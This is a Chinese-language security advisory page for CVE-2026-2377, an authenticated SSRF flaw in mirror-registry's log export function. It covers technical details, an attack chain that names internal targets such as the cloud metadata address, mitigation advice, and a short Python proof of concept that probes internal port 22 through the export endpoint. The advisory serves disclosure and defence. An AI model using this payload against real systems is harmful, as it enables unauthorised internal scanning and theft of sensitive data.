CVE-2026-2377 CVSS 6.5 中危

CVE-2026-2377 mirror-registry SSRF漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2377

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

mirror-registry

漏洞概述

CVE-2026-2377是mirror-registry组件中存在的一个安全漏洞。经过身份验证的攻击者可以滥用日志导出功能，通过提供精心构造的恶意URL地址，诱使应用程序后端向内部网络资源发起任意请求。该漏洞属于典型的服务器端请求伪造（SSRF），攻击者利用此漏洞可能导致敏感信息被窃取，或实现对内部系统的未授权访问。

技术细节

该漏洞的根本原因在于mirror-registry的日志导出功能未能对用户输入的目标URL实施严格的网络位置校验。当具有低权限的认证用户触发日志导出操作时，后端服务会直接抓取用户指定的URL内容。攻击者利用此机制，可构造指向内网敏感资源的URL（例如127.0.0.1:8080、AWS元数据服务169.254.169.254等）。由于请求发自受信任的服务器端，这类攻击极易绕过网络边界防火墙。成功的SSRF利用不仅允许攻击者探测内网端口拓扑，还能结合内网其他漏洞获取敏感信息，甚至进一步横向移动，严重威胁内网安全。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者获取mirror-registry的低权限用户账号凭证，并确认日志导出接口的存在。

STEP 2

2. 构造恶意Payload

攻击者构造包含内网敏感地址（如127.0.0.1或元数据服务）的URL参数。

STEP 3

3. 发起SSRF攻击

攻击者向日志导出端点发送带有恶意URL的请求，服务器后端代为请求内网资源。

STEP 4

4. 数据窃取或内网探测

根据服务器返回的响应内容或响应时间差异，判断内网端口状态或获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: mirror-registry Log Export SSRF (CVE-2026-2377)
# Vulnerability Type: Server-Side Request Forgery

# Target URL (example)
target_url = "http://vulnerable-host/api/v1/logs/export"

# Malicious internal URL to scan
internal_url = "http://127.0.0.1:22" # Checking if SSH is running internally

# Headers with Authorization (PR:L requires auth)
headers = {
    "Authorization": "Bearer <valid-auth-token>",
    "Content-Type": "application/json"
}

# Payload triggering the SSRF
payload = {
    "url": internal_url
}

try:
    print(f"[+] Sending request to {target_url} with payload: {payload}")
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request successful. Check response length/timing for port status.")
        print(f"Response: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

mirror-registry (具体受影响版本请参考Red Hat安全公告 RHSA-2026:19375)

防御指南

临时缓解措施

建议立即应用官方修复补丁，并在补丁生效前，通过防火墙限制服务器对内网敏感网段的出站访问，同时加强对日志导出功能的权限管控。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-2377
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-2377
3 Details https://www.cvedetails.com/cve/CVE-2026-2377/
4 VulDB https://vuldb.com/cve/CVE-2026-2377
5 Link https://access.redhat.com/errata/RHSA-2026:19375
6 Link https://access.redhat.com/security/cve/CVE-2026-2377
7 Link https://bugzilla.redhat.com/show_bug.cgi?id=2439201

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表